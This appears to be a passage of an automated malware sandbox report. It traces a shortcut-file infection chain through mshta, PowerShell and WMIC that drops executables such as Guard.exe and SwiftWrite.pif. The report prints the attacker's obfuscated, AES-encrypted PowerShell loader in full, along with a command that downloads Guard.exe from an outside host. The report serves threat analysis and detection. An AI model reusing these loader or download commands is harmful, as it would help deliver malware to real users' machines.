Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: lKin1m7Pf2.lnkLNK file: ..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1528320950.0000024648EE8000.00000004.00000020.00020000.00000000.sdmp, duychuan1[1].6.dr
Source: Binary string: sethc.pdb source: duychuan1[1].6.dr

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = 'B82AEEF674EA461AE377F8820935DD6157C01BC158BC192B4D1FF275835196DB33CF9EA1DE8672BA8F13D9AC875E580005F1EEA8672491F8AE79545F0A3E6D28CDEBD23FDE238E22EF8A9864B4FBA2FB0AFD2BA44D7DEE9A46432584130E7127CFD52A4753431163022C03AF7CC276CE0CDAE4C73F5FAC8BAC96006DF862D8169BBBE59DE533B3D81E857E95C73B04260783980346063862C5E612A3A994E6BB90426E91F2B26513990DC2C312A0AAEEEE1E2430571B6262AA184D3BD5C6F41FA7366D5B1D3230EA02D066606A12E58A21B8431BF617F7D977957268A165344D1BC58BFF59112747E8EAA5D777BC05A7ED38045D53C5DA5BFAD3E02C94ECA70B8C09C3B0251F7DA4DC9D080054A23130E31F08E6713AED726E22995D4273A7A841BCC8666EDCAFE4D29673B36A8206C7E3EF3ED8E01080C463A9707900BDBEFA9F99B4AECD550204798892485F6D659E300CFE096802C6439B262A12242B1359A8AD50E5705DA1F36481A32BCFA6A84550378539F30631F5338D15EBB8777EB0C84CC4D6E54178637067A553A9E604C65F3BF58DD192BEA48AFBF555658EABDC5697F8D58AD5D736F382438D70C4B612ECBFC02FFA54DF9E83E7FF840AAEF928E8A5E9882628C6D9379A91609B607CB4FF8B760F7D0C6DBF47A7FAC72026E33B894AB8D3FA6A6AE87F122119C7B4F7E2D62775A308A302D221EEFE5F680A2DB166C1A1033C034B27DE5331479F36CCDB24CA195ECE0042B52BA4878C1A8F8791737C47875A69DA16D71E580C06DB3F0AB8EF3147C23C6FBB2C2C538207E15D4D789CDD0AFC1EF1F49C1C698DE94DEF69BC21348FB6B347482DD337FAA5FEA6B67D3F934BD5BF565BD06B122C07EF2E3FDE1B1730E2E2E5CE71A5AEC4E7A6FBA6B3801709F0DD9DA78A07A71C593622EB95AD7BC50F2BB14E99149243677363B48C9D7A5941A240076C907E45503A494D4B06A3B019F2BB7451E8D82D32F7867901457CC272F82CB802B79BF2845527BB746EEDBCF56383F8F7E1CF75C01224B66BDE0789795A713DC161FF2B609E9976E1DF022746904D8DC89F8EE01F04D892F375924023F6317DB683D766704DCC229E3D3EF1CA3E7E1B357A03846B92931A330644457340BF7331A6CB5739F22119D33470250D70590A6F1C0A08150EEFA53A0927BB4D168D44A2E0B9B78DE17426C1F82271F18F27203AEE39AEEBE330B479B2B38EE5AA510053589FB1166A4E42792D1BC64A75A303766AC764A47348073E49C426C770FA5B5AEAA2AE449E423CD35861340656797A23C1FD752A26B13575CE28A7313CF32508080F609F9BD9B56F8F7A6D04B10CDDC40B660686C1C2A6F90B8CDA50B1EFA31BF0A15852D8D00C56B7516118FEF0030E99C46248CE4B26E648D5F49111F4000436F9B68A5B8062614B4E5179666A715556704755565176';function tKQ ($VNRiPvLz){return -split ($VNRiPvLz -replace '..', '0x$& ')};$YYRv = tKQ($ddg.SubString(0, 2016));$Pks = [System.Security.Cryptography.Aes]::Create();$Pks.Key = tKQ($ddg.SubString(2016));$Pks.IV = New-Object byte[] 16;$udeEb = $Pks.CreateDecryptor();$fBRzq = [System.String]::new($udeEb.TransformFinalBlock($YYRv, 0,$YYRv.Length)); sal fd $fBRzq.Substring(3,3); fd $fBRzq.Substring(6)Jump to behavior
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/kfSlwlO" -OutFile "C:\Users\Public\Guard.exe""
Source: duychuan1[1].6.drStatic PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656077634 LoadLibraryA,GetProcAddress,16_2_00007FF656077634
Source: duychuan1[1].6.drStatic PE information: real checksum: 0x20826 should be: 0x6dea4
Source: duychuan1[1].6.drStatic PE information: section name: .didat
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF6560178FD push rdi; ret 16_2_00007FF656017904
Source: C:\Users\user\AppData\Roaming\BnQwAP.exeCode function: 16_2_00007FF656017399 push rdi; ret 16_2_00007FF6560173A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFB498100BD pushad ; iretd 21_2_00007FFB498100C1

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Drops PE files with a suspicious file extension
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\BnQwAP.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]Jump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
